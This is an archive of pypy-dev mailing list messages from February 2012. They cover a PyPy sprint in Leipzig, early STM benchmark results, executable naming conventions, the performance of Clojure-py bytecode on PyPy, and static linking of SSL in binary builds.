22:17:42 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 16 Feb 2012 22:17:42 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: <4F3D700D.5010009@python-academy.de> References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> Message-ID: Hi Mike, On Thu, Feb 16, 2012 at 22:07, Mike M?ller wrote: > We can move the date. One week or only a few days? Like 22nd till 27th > of June would put four days in between the sprint and EP. That would work too. Antonio, would such dates let you come to Leipzig for at least most of the sprint, or should we say "too bad" for you? A bient?t, Armin. From fijall at gmail.com Thu Feb 16 22:21:01 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Thu, 16 Feb 2012 23:21:01 +0200 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: On Thu, Feb 16, 2012 at 10:58 PM, Armin Rigo wrote: > Hi all, > > An update for STM: today I managed to build a pypy using the new "stm > gc". ?It runs richards.py on tannit: > > in 1 thread: 2320 ms per iteration > in 2 threads: 1410 ms per iteration > in 4 threads: 785 ms per iteration > in 8 threads: 685 ms per iteration > > The small gap between 4 and 8 threads is due to tannit having only 4 > "real" cpus, each one hyperthreaded. ?The additional gain is thus > smaller than expected. > > For comparison, a "pypy --jit off" runs at 650ms per iteration. ?So > the single-threaded performance is already at only 3.6x worse, and > moreover there are still a few easy big-win optimizations. ?I will > confirm it in a few days, but I would say that this shows it's working > quite well. :-) > > At least, it's fun to see in "top" a single pypy process using 397% cpu :-) > > For people interested, it is in the "stm-gc" branch; at least > bba9b03f5e70 works. ?Linux-only for now: ?" translate.py -O1 --stm > targetpypystandalone --no-allworkingmodules --withmod-transaction > --withmod-select --withmod-_socket ". ?The modified version of > richards.py I use is in pypy/translator/stm/test/. > > > A bient?t, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Wow great work! Seems like a JIT can do a good job here as well with removing extra overheads. From arigo at tunes.org Thu Feb 16 22:48:56 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 16 Feb 2012 22:48:56 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi Maciek, On Thu, Feb 16, 2012 at 22:21, Maciej Fijalkowski wrote: > Wow great work! Seems like a JIT can do a good job here as well with > removing extra overheads. Yes. That's still far away, though. But at the rhythm it's going, maybe in a couple of month...? A bient?t, Armin. From anto.cuni at gmail.com Fri Feb 17 00:27:25 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Fri, 17 Feb 2012 00:27:25 +0100 Subject: [pypy-dev] PyPy/NumPyPy sprint(s) in Leipzig, Germany? In-Reply-To: References: <4EFF29FF.7040009@python-academy.de> <4F2042BB.8050107@gmail.com> <4F208672.1020501@python-academy.de> <4F21253F.3020506@gmail.com> <4F22890B.1090906@python-academy.de> <4F2291B9.4070809@python-academy.de> <4F3BC2A4.4000105@python-academy.de> <4F3BEAFB.9000406@gmail.com> <4F3D700D.5010009@python-academy.de> Message-ID: <4F3D90DD.2010804@gmail.com> On 02/16/2012 10:17 PM, Armin Rigo wrote: > Hi Mike, > > On Thu, Feb 16, 2012 at 22:07, Mike M?ller wrote: >> We can move the date. One week or only a few days? Like 22nd till 27th >> of June would put four days in between the sprint and EP. > > That would work too. Antonio, would such dates let you come to > Leipzig for at least most of the sprint, or should we say "too bad" > for you? yes, those dates might work for me. However, I'd prefer not to do any promise, so if people prefer to do 25-30, then too bad for me. Just pick the period that you prefer, and then if I manage I'll be glad to come. ciao, Anto From aaron.devore at gmail.com Fri Feb 17 03:41:19 2012 From: aaron.devore at gmail.com (Aaron DeVore) Date: Thu, 16 Feb 2012 18:41:19 -0800 Subject: [pypy-dev] Global executable naming policy Message-ID: There currently isn't an official naming scheme for the PyPy executable for system installations. Of the 3 setups I've seen, the official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses pypy-c. I brought up the similar issue of how to differentiate between Python 2 and 3 a while ago, but the conversation sputtered out. One possible naming scheme includes these executables using Python 2.7, Python 3.3, and PyPy 1.9 as an example: pypy pypy-1.9 pypy2 pypy2-1.9 pypy3 pypy3-1.9 pypy2.7 pypy2.7-1.9 pypy3.3 pypy3.3-1.9 -Aaron DeVore From william.leslie.ttg at gmail.com Fri Feb 17 03:57:35 2012 From: william.leslie.ttg at gmail.com (William ML Leslie) Date: Fri, 17 Feb 2012 13:57:35 +1100 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On 17 February 2012 13:41, Aaron DeVore wrote: > There currently isn't an official naming scheme for the PyPy > executable for system installations. Of the 3 setups I've seen, the > official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses > pypy-c. I brought up the similar issue of how to > differentiate between Python 2 and 3 a while ago, but the conversation > sputtered out. On a related note, can we see situations where people only want to specify the language level, only want to specify the pypy version, or only want to specify the backend? Of course it is easy to specify /a specific installation/, and I suppose people want to be able to specify 'the default pypy' too. There is also the question of how much of this should be provided, and how much should be left to package maintainers or custom configuration; for Windows, 'pypy' and 'pypy3' are probably sufficient. -- William Leslie From aaron.devore at gmail.com Fri Feb 17 06:21:28 2012 From: aaron.devore at gmail.com (Aaron DeVore) Date: Thu, 16 Feb 2012 21:21:28 -0800 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: Gentoo's CPython package gives python, python2, python3, python2.x, and python3.x. Gentoo's PyPy package allows parallel PyPy versions by appending a version number. The names I listed would bring PyPy up to the level of CPython. -Aaron DeVore > On a related note, can we see situations where people only want to > specify the language level, only want to specify the pypy version, or > only want to specify the backend? ?Of course it is easy to specify /a > specific installation/, and I suppose people want to be able to > specify 'the default pypy' too. ?There is also the question of how > much of this should be provided, and how much should be left to > package maintainers or custom configuration; for Windows, 'pypy' and > 'pypy3' are probably sufficient. > > -- > William Leslie From william.leslie.ttg at gmail.com Fri Feb 17 06:29:26 2012 From: william.leslie.ttg at gmail.com (William ML Leslie) Date: Fri, 17 Feb 2012 16:29:26 +1100 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On 17 February 2012 16:21, Aaron DeVore wrote: > Gentoo's CPython package gives python, python2, python3, python2.x, > and python3.x. Gentoo's PyPy package allows parallel PyPy versions by > appending a version number. The names I listed would bring PyPy up to > the level of CPython. Sure, but the pypy equivalent of cpython is pypy-c. You would probably not want to have cpython and jython with the same name by default, nor would you probably want to have pypy-c and pypy-jvm with the same name. The reason it matters is that applications may depend on particular integration features, or not, in which case whatever backend is available is fine. -- William Leslie From dirkjan at ochtman.nl Fri Feb 17 09:43:27 2012 From: dirkjan at ochtman.nl (Dirkjan Ochtman) Date: Fri, 17 Feb 2012 09:43:27 +0100 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On Fri, Feb 17, 2012 at 03:41, Aaron DeVore wrote: > There currently isn't an official naming scheme for the PyPy > executable for system installations. Of the 3 setups I've seen, the > official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses > pypy-c. FWIW, if people feel it should be pypy instead of pypy-c, I'm happy to change it. Cheers, Dirkjan From fijall at gmail.com Fri Feb 17 09:46:52 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 10:46:52 +0200 Subject: [pypy-dev] Global executable naming policy In-Reply-To: References: Message-ID: On Fri, Feb 17, 2012 at 10:43 AM, Dirkjan Ochtman wrote: > On Fri, Feb 17, 2012 at 03:41, Aaron DeVore wrote: >> There currently isn't an official naming scheme for the PyPy >> executable for system installations. Of the 3 setups I've seen, the >> official build uses pypy, Arch Linux uses pypy, and Gentoo Linux uses >> pypy-c. > > FWIW, if people feel it should be pypy instead of pypy-c, I'm happy to > change it. We (arbitrarily) decided pypy for binary distributions. It's still called pypy-c when it is compiled. I would go for pypy. Note that there is no point in pypy2.7-1.9, since there will never be any other pypy2 but pypy2.7. pypy3.3-1.9 sounds relatively obscure and verbose to me, but whatever. How about pypypy for pypy3 instead? () Cheers, fijal From tbaldridge at gmail.com Fri Feb 17 14:03:22 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 07:03:22 -0600 Subject: [pypy-dev] Poor performance with custom bytecode Message-ID: Last night, I was finally able to get enough of core.clj implemented to run a basic factorial program in clojure-py (https://github.com/halgari/clojure-py). In this project we use byteplay to generate bytecode for clojure routines, and run the entire language off the python vm. In general, I've been very impressed with the performance of pypy, but this factorial program takes about 2x longer to complete than the same routine running on CPython. Perhaps someone can give me some pointers? The core of the whole test is the factorial function: (ns clojure.examples.factorial) (defn fact [x] (loop [n x f 1] (if (= n 1) f (recur (dec n) (* f n))))) (defn test [times] (loop [rem times] (if (> rem 0) (do (fact 20000) (print rem) (recur (dec rem)))))) (test 20) It all seems to match normal python bytecode, with one exception: the implementation of *, = and >. In clojure these functions can take 0 to n arguments and perform different logic based on the results. Our solution? to stuff the arguments into __argsv__ and then perform a len() on this argument, and jump to different code blocks based on the length of the input tuple. Now I know this code may not be super fast, but it seems to work fine in CPython. Could this be the pain point for us in pypy? Any thoughts/ideas? clojure.examples.factorial=> (dis.dis *) 0 0 LOAD_FAST 0 (__argsv__) 3 LOAD_ATTR 0 (__len__) 6 CALL_FUNCTION 0 9 LOAD_CONST 1 (0) 12 COMPARE_OP 2 (==) 15 POP_JUMP_IF_FALSE 22 18 LOAD_CONST 2 (1) 21 RETURN_VALUE >> 22 LOAD_FAST 0 (__argsv__) 25 LOAD_ATTR 0 (__len__) 28 CALL_FUNCTION 0 31 LOAD_CONST 2 (1) 34 COMPARE_OP 2 (==) 37 POP_JUMP_IF_FALSE 54 40 LOAD_FAST 0 (__argsv__) 43 LOAD_CONST 1 (0) 46 BINARY_SUBSCR 47 STORE_FAST 1 (x) 50 LOAD_FAST 1 (x) 53 RETURN_VALUE >> 54 LOAD_FAST 0 (__argsv__) 57 LOAD_ATTR 0 (__len__) 60 CALL_FUNCTION 0 63 LOAD_CONST 3 (2) 66 COMPARE_OP 2 (==) 69 POP_JUMP_IF_FALSE 100 72 LOAD_FAST 0 (__argsv__) 75 LOAD_CONST 1 (0) 78 BINARY_SUBSCR 79 STORE_FAST 1 (x) 82 LOAD_FAST 0 (__argsv__) 85 LOAD_CONST 2 (1) 88 BINARY_SUBSCR 89 STORE_FAST 2 (y) 1010 92 LOAD_FAST 1 (x) 95 LOAD_FAST 2 (y) 98 BINARY_MULTIPLY 99 RETURN_VALUE >> 100 LOAD_FAST 0 (__argsv__) 103 LOAD_ATTR 0 (__len__) 106 CALL_FUNCTION 0 109 LOAD_CONST 3 (2) 112 COMPARE_OP 5 (>=) 115 POP_JUMP_IF_FALSE 173 118 LOAD_FAST 0 (__argsv__) 121 LOAD_CONST 1 (0) 124 BINARY_SUBSCR 125 STORE_FAST 1 (x) 128 LOAD_FAST 0 (__argsv__) 131 LOAD_CONST 2 (1) 134 BINARY_SUBSCR 135 STORE_FAST 2 (y) 138 LOAD_FAST 0 (__argsv__) 141 LOAD_CONST 3 (2) 144 SLICE+1 145 STORE_FAST 3 (more) 1012 148 LOAD_GLOBAL 1 (reduce1) 151 LOAD_GLOBAL 2 (*) 154 LOAD_GLOBAL 2 (*) 157 LOAD_FAST 1 (x) 160 LOAD_FAST 2 (y) 163 CALL_FUNCTION 2 166 LOAD_FAST 3 (more) 169 CALL_FUNCTION 3 172 RETURN_VALUE >> 173 LOAD_CONST 4 () 176 CALL_FUNCTION 0 179 RAISE_VARARGS 1 None Thanks, Timothy Baldridge -- ?One of the main causes of the fall of the Roman Empire was that?lacking zero?they had no way to indicate successful termination of their C programs.? (Robert Firth) From anto.cuni at gmail.com Fri Feb 17 14:18:14 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Fri, 17 Feb 2012 14:18:14 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: Message-ID: <4F3E5396.70705@gmail.com> Hello Timothy, On 02/17/2012 02:03 PM, Timothy Baldridge wrote: > clojure.examples.factorial=> (dis.dis *) > 0 0 LOAD_FAST 0 (__argsv__) > 3 LOAD_ATTR 0 (__len__) > 6 CALL_FUNCTION 0 I didn't look in depth at the bytecode produced by your compiler, but this is very sub-optimal. In pypy we have a custom opcode to call methods, which is much faster than LOAD_ATTR/CALL_FUNCTION. See e.g. how this piece of code gets compiled: >>>> def foo(x): .... return foo.__len__() .... >>>> import dis >>>> dis.dis(foo) 2 0 LOAD_GLOBAL 0 (foo) 3 LOOKUP_METHOD 1 (__len__) 6 CALL_METHOD 0 9 RETURN_VALUE In general, I suggest to use the jitviewer to look at which code the JIT generates: it shows you how many low level operations are emitted for each opcode, and you can compare with the same algorithm written in python to see what causes the most slowdown. ciao, Anto From anto.cuni at gmail.com Fri Feb 17 14:29:01 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Fri, 17 Feb 2012 14:29:01 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> Message-ID: <4F3E561D.2080307@gmail.com> On 02/17/2012 02:27 PM, Timothy Baldridge wrote: >> In pypy we have a custom opcode to call methods, which is much faster than >> LOAD_ATTR/CALL_FUNCTION. See e.g. how this piece of code gets compiled: >> > > Excellent! I was unaware of this. Just last night I started > abstracting some bytecode generation to support both 2.6 and 2.7, so > it won't be hard to slot in improvements for pypy. > > From there, I'll start looking into jitviewer. I suggest to look at the jitviewer before doing this. I might be wrong and LOAD_ATTR/CALL_FUNCTION be efficient enough, I don't know. Also note that you should hit reply-all when replying, else you send the email only to the author and not to the ML (I re-added pypy-dev in CC). ciao, Anto From fijall at gmail.com Fri Feb 17 14:35:25 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 15:35:25 +0200 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: <4F3E561D.2080307@gmail.com> References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 3:29 PM, Antonio Cuni wrote: > On 02/17/2012 02:27 PM, Timothy Baldridge wrote: >>> >>> In pypy we have a custom opcode to call methods, which is much faster >>> than >>> LOAD_ATTR/CALL_FUNCTION. See e.g. how this piece of code gets compiled: >>> >> >> Excellent! I was unaware of this. Just last night I started >> abstracting some bytecode generation to support both 2.6 and 2.7, so >> it won't be hard to slot in improvements for pypy. >> >> ?From there, I'll start looking into jitviewer. > > > I suggest to look at the jitviewer before doing this. I might be wrong and > LOAD_ATTR/CALL_FUNCTION be efficient enough, I don't know. > > Also note that you should hit reply-all when replying, else you send the > email only to the author and not to the ML (I re-added pypy-dev in CC). > > > ciao, > Anto > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Hi Timothy. First question - why did you choose to implement this as a compiler to python bytecode? It does sound like an interpreter written in rpython would have both a much better performance and a much easier implementation (compiler vs interpreter). Cheers, fijal From tbaldridge at gmail.com Fri Feb 17 15:17:37 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 08:17:37 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: > First question - why did you choose to implement this as a compiler to > python bytecode? It does sound like an interpreter written in rpython > would have both a much better performance and a much easier > implementation (compiler vs interpreter). A few reasons for this. Mostly I didn't want to have to build up an entire standard lib. Clojure is a bit unique in that it doesn't define a standard library beyond the ~200 functions found in core.clj. This means that Clojure leaves IO, GUI, etc, completely up to the VM. So for stock Clojure this means you drop to Java interop whenever you want to do IO. If, however, I develop the entire thing off of CPython/pypy, I can use all the libraries for these platforms that are already quite documented and stable. "Don't re-invent the wheel" is more or less the mantra of Clojure implementation developers. Long term though, I plan on implementing part (if not all) of Clojure-py in RPython. This may be as simple as doing a pull request to pypy asking to have my immutable structures adopted into the stock VM, or I may attempt to build a from-scratch interpreter, we'll see. So I guess it's like this: I could go with a custom VM, but when I'm done, there's really not a whole lot my VM could do besides run benchmarks. Even as clojure-py stands now, you could probably sit down in one night and write a full blown Qt app via PySide with it, the interop with Python is that good. So as it stands, we can write apps with Django, PySide, numpy, etc. in Clojure and only after about 3 months worth of work! The other thing that has been bugging me more and more lately, is what benefit a RPython interpreter would get me. Besides Python's lack of overloaded functions, there's really no features in Python I can't find a use for in the Clojure compiler, and there's really nothing I'm lacking in the pypy VM. Timothy From tbaldridge at gmail.com Fri Feb 17 15:18:46 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 08:18:46 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Oh yeah, I forgot. The other nice thing about doing clojure-py in Python is that I should be able to write RPython code in Clojure. Lisp macros FTW! Timothy -- ?One of the main causes of the fall of the Roman Empire was that?lacking zero?they had no way to indicate successful termination of their C programs.? (Robert Firth) From celebdor at gmail.com Fri Feb 17 15:51:49 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Fri, 17 Feb 2012 15:51:49 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: Hi Timothy, I'm new in the list and I was very recently planning to do a pet project in implementing a clojure interpreter in Rpython. Of course, I share the same concerns as you about the standard library issue (although your body of work on the issue gives you a much better understanding of all the concerns, which at the moment I can only guess), so I was planning as starting with a very simple dummy interpreter and then build on top of that more features as time and skill allow. I will try to check your clojure implementation this weekend. Hopefully I will manage to do something useful :) A more generally targeted question, besides the sample rpython tutorial for brainfuck, what are the recommended readings (parts of the pypy code, papers, etc), tools and/or magic for working at rpython on an interpreter? I saw that there will be a sprint soon in Berlin (and it not being that far from Prague, if the dates allow, it might be possible for me to take some vacation days and assist). In regards to that, having only experience with python and almost none in interpreter writing, will my presence there be of any value? I can imagine that you must want to do a lot of work in such an event and that a newbie like me might not be the thing to have around. Thus, I would like to ask if with the readings that I ask in the previous paragraph there would be some easy task that I could work on to get acquainted with the software and assist another future sprint. Best regards, Antoni Segura Puimedon On Fri, Feb 17, 2012 at 3:18 PM, Timothy Baldridge wrote: > Oh yeah, I forgot. The other nice thing about doing clojure-py in > Python is that I should be able to write RPython code in Clojure. Lisp > macros FTW! > > Timothy > > > -- > ?One of the main causes of the fall of the Roman Empire was > that?lacking zero?they had no way to indicate successful termination > of their C programs.? > (Robert Firth) > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > -------------- next part -------------- An HTML attachment was scrubbed... URL: From santagada at gmail.com Fri Feb 17 15:55:14 2012 From: santagada at gmail.com (Leonardo Santagada) Date: Fri, 17 Feb 2012 12:55:14 -0200 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: On Tue, Feb 14, 2012 at 7:45 AM, Maciej Fijalkowski wrote: > It's not PyPy requirement, it's the binary requirement. To be honest, > binary distribution on linux is a major mess. Fortunately for most > popular distributions there is a better or worse source of official or > semi-official way to get it directly from the distribution and that;'s > a recommended way (fedora, ubuntu, debian, gentoo and arch package > pypy). why not statically link everything and mark the pre built binaries a "security risk" or whatever and then they will just work. -- Leonardo Santagada From tbaldridge at gmail.com Fri Feb 17 16:11:55 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Fri, 17 Feb 2012 09:11:55 -0600 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: > A more generally targeted question, besides the sample rpython tutorial for > brainfuck, what are the recommended readings (parts of the pypy code, > papers, etc), tools and/or magic for working at rpython on an interpreter? Now, most of this code is more or less crap, but I do suggest taking a look at my first stab at a RPython interpreter for Clojure https://github.com/halgari/clj-pypy IIRC, the target complied okay, and you could run the code in scratchspace.clj. Basically I got to the point where I realized that if I had lisp macros, I could write RPython code way faster. Half of the structures in Clojure follow this pattern: class Foo(object): def __init__(self, foo bar, baz): self.foo = foo self.bar = bar self.baz = baz def addBarBaz(self): return bar + baz I could write that for that, or, in Clojure I could write myself a macro and just do: (deftype Foo [foo bar baz] (addBarBaz[self] (+ bar baz))) So basically I've found that I can write the same code in the following languages with this line ratio: Clojure: 1 Python: 3 Java: 6 This is the reason I shelved the RPython idea. If I want to dramatically re-define how types are handled in Clojure-py all I have to do is re-write a single macro. "Why write a jit when you can have RPython do it for you?" "Why write a typesystem, when you can have Clojure macros do it for you?" Timothy -- ?One of the main causes of the fall of the Roman Empire was that?lacking zero?they had no way to indicate successful termination of their C programs.? (Robert Firth) From fijall at gmail.com Fri Feb 17 16:23:07 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 17:23:07 +0200 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 5:11 PM, Timothy Baldridge wrote: >> A more generally targeted question, besides the sample rpython tutorial for >> brainfuck, what are the recommended readings (parts of the pypy code, >> papers, etc), tools and/or magic for working at rpython on an interpreter? > > > Now, most of this code is more or less crap, but I do suggest taking a > look at my first stab at a RPython interpreter for Clojure > > https://github.com/halgari/clj-pypy > > > IIRC, the target complied okay, and you could run the code in scratchspace.clj. > > Basically I got to the point where I realized that if I had lisp > macros, I could write RPython code way faster. Half of the structures > in Clojure follow this pattern: > > class Foo(object): > ? ?def __init__(self, foo bar, baz): > ? ? ? ? self.foo = foo > ? ? ? ? self.bar = bar > ? ? ? ? self.baz = baz > ? ?def addBarBaz(self): > ? ? ? ? return bar + baz > > I could write that for that, or, in Clojure I could write myself a > macro and just do: > > (deftype Foo [foo bar baz] > ? ? ?(addBarBaz[self] (+ bar baz))) > Just a sidenote - RPython allows you to do metaprogramming. It's not as easy and pleasant, but you can generate code. In fact we do it all over the place in pypy either using string and exec() or closures that return slightly different classes for each set of given parameters. From celebdor at gmail.com Fri Feb 17 16:23:44 2012 From: celebdor at gmail.com (Antoni Segura Puimedon) Date: Fri, 17 Feb 2012 16:23:44 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 4:11 PM, Timothy Baldridge wrote: > > A more generally targeted question, besides the sample rpython tutorial > for > > brainfuck, what are the recommended readings (parts of the pypy code, > > papers, etc), tools and/or magic for working at rpython on an > interpreter? > > > Now, most of this code is more or less crap, but I do suggest taking a > look at my first stab at a RPython interpreter for Clojure > > https://github.com/halgari/clj-pypy > > > IIRC, the target complied okay, and you could run the code in > scratchspace.clj. > > Basically I got to the point where I realized that if I had lisp > macros, I could write RPython code way faster. Half of the structures > in Clojure follow this pattern: > > class Foo(object): > def __init__(self, foo bar, baz): > self.foo = foo > self.bar = bar > self.baz = baz > def addBarBaz(self): > return bar + baz > > I could write that for that, or, in Clojure I could write myself a > macro and just do: > > (deftype Foo [foo bar baz] > (addBarBaz[self] (+ bar baz))) > > So basically I've found that I can write the same code in the > following languages with this line ratio: > > Clojure: 1 > Python: 3 > Java: 6 > > This is the reason I shelved the RPython idea. If I want to > dramatically re-define how types are handled in Clojure-py all I have > to do is re-write a single macro. > > > > > "Why write a jit when you can have RPython do it for you?" > > "Why write a typesystem, when you can have Clojure macros do it for you?" > This would be the clojurescript approach, right? > > > > Timothy > > > > -- > ?One of the main causes of the fall of the Roman Empire was > that?lacking zero?they had no way to indicate successful termination > of their C programs.? > (Robert Firth) > -------------- next part -------------- An HTML attachment was scrubbed... URL: From amauryfa at gmail.com Fri Feb 17 16:24:24 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Fri, 17 Feb 2012 16:24:24 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: 2012/2/17 Timothy Baldridge > Basically I got to the point where I realized that if I had lisp > macros, I could write RPython code way faster. Half of the structures > in Clojure follow this pattern: > > class Foo(object): > def __init__(self, foo bar, baz): > self.foo = foo > self.bar = bar > self.baz = baz > def addBarBaz(self): > return bar + baz > > I could write that for that, or, in Clojure I could write myself a > macro and just do: > > (deftype Foo [foo bar baz] > (addBarBaz[self] (+ bar baz))) > Remember that RPython works with imported modules, on classes and functions in memory. You are free to use exec() or eval() to build code. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Fri Feb 17 16:25:18 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Fri, 17 Feb 2012 17:25:18 +0200 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> <4F3E561D.2080307@gmail.com> Message-ID: On Fri, Feb 17, 2012 at 5:23 PM, Maciej Fijalkowski wrote: > On Fri, Feb 17, 2012 at 5:11 PM, Timothy Baldridge wrote: >>> A more generally targeted question, besides the sample rpython tutorial for >>> brainfuck, what are the recommended readings (parts of the pypy code, >>> papers, etc), tools and/or magic for working at rpython on an interpreter? >> >> >> Now, most of this code is more or less crap, but I do suggest taking a >> look at my first stab at a RPython interpreter for Clojure >> >> https://github.com/halgari/clj-pypy >> >> >> IIRC, the target complied okay, and you could run the code in scratchspace.clj. >> >> Basically I got to the point where I realized that if I had lisp >> macros, I could write RPython code way faster. Half of the structures >> in Clojure follow this pattern: >> >> class Foo(object): >> ? ?def __init__(self, foo bar, baz): >> ? ? ? ? self.foo = foo >> ? ? ? ? self.bar = bar >> ? ? ? ? self.baz = baz >> ? ?def addBarBaz(self): >> ? ? ? ? return bar + baz >> >> I could write that for that, or, in Clojure I could write myself a >> macro and just do: >> >> (deftype Foo [foo bar baz] >> ? ? ?(addBarBaz[self] (+ bar baz))) >> > > Just a sidenote - RPython allows you to do metaprogramming. It's not > as easy and pleasant, but you can generate code. In fact we do it all > over the place in pypy either using string and exec() or closures that > return slightly different classes for each set of given parameters. To go even further - you can do whatever you like that ends up with living python objects. Then they can be compiled as RPython. If you feel like bootstrapping by having pieces compiled to RPython then it's all good. From arigo at tunes.org Fri Feb 17 18:23:46 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:23:46 +0100 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: Hi Leonardo, On Fri, Feb 17, 2012 at 15:55, Leonardo Santagada wrote: > why not statically link everything and mark the pre built binaries a > "security risk" or whatever and then they will just work. Anyone can either install PyPy from his own distribution, or translate it from sources; or attempt to get one of our nightly binary packages, which may or may not work because it's Linux. I think that this is what you get on Linux, and we will not try to find obscure workarounds (like making all our nightly binary packages twice as big just for this use case). A bient?t, Armin. From arigo at tunes.org Fri Feb 17 18:28:37 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:28:37 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: Message-ID: Hi Timothy, On Fri, Feb 17, 2012 at 14:03, Timothy Baldridge wrote: > In general, I've been very impressed with > the performance of pypy, but this factorial program takes about 2x > longer to complete than the same routine running on CPython. It's factorial(), so it's handling large "longs". So it's about 2x as slow as CPython. End of the story. Just to be sure, before digging into bytecodes you generate, try to compare the pure Python versions of factorial. The PyPy one is twice as slow as the CPython one because it's all about large "longs". A bient?t, Armin. From arigo at tunes.org Fri Feb 17 18:30:31 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:30:31 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: <4F3E5396.70705@gmail.com> References: <4F3E5396.70705@gmail.com> Message-ID: Hi Anto, On Fri, Feb 17, 2012 at 14:18, Antonio Cuni wrote: >>>>> def foo(x): > .... ? ? return foo.__len__() How about "return len(foo)" instead? That's even more natural as Python code. But I guess anyway that all three solutions get JIT-compiled to basically the same thing. A bient?t, Armin. From santagada at gmail.com Fri Feb 17 18:33:45 2012 From: santagada at gmail.com (Leonardo Santagada) Date: Fri, 17 Feb 2012 15:33:45 -0200 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: References: <4F3991C8.5040305@u.washington.edu> Message-ID: On Fri, Feb 17, 2012 at 3:23 PM, Armin Rigo wrote: > Hi Leonardo, > > On Fri, Feb 17, 2012 at 15:55, Leonardo Santagada wrote: >> why not statically link everything and mark the pre built binaries a >> "security risk" or whatever and then they will just work. > > Anyone can either install PyPy from his own distribution, or translate > it from sources; or attempt to get one of our nightly binary packages, > which may or may not work because it's Linux. ?I think that this is > what you get on Linux, and we will not try to find obscure workarounds > (like making all our nightly binary packages twice as big just for > this use case). it would also make testing old nightly builds much easier, as they will just work on any machine with any openssl. Another option would be to do a semi-source distro, shipping the resulting c files and the makefile so people would still need to compile the sources but it would link to the openssl lib they have available or does the c files too specific to work? Is static linking really obscure? Just use xz instead of gz to compress the binaries and you will probably get most of the space back. It is far easier to find a xz binary then to find a machine with +/- 2 hours and 4gb of ram to build a pypy from source. -- Leonardo Santagada From arigo at tunes.org Fri Feb 17 18:38:32 2012 From: arigo at tunes.org (Armin Rigo) Date: Fri, 17 Feb 2012 18:38:32 +0100 Subject: [pypy-dev] Poor performance with custom bytecode In-Reply-To: References: <4F3E5396.70705@gmail.com> 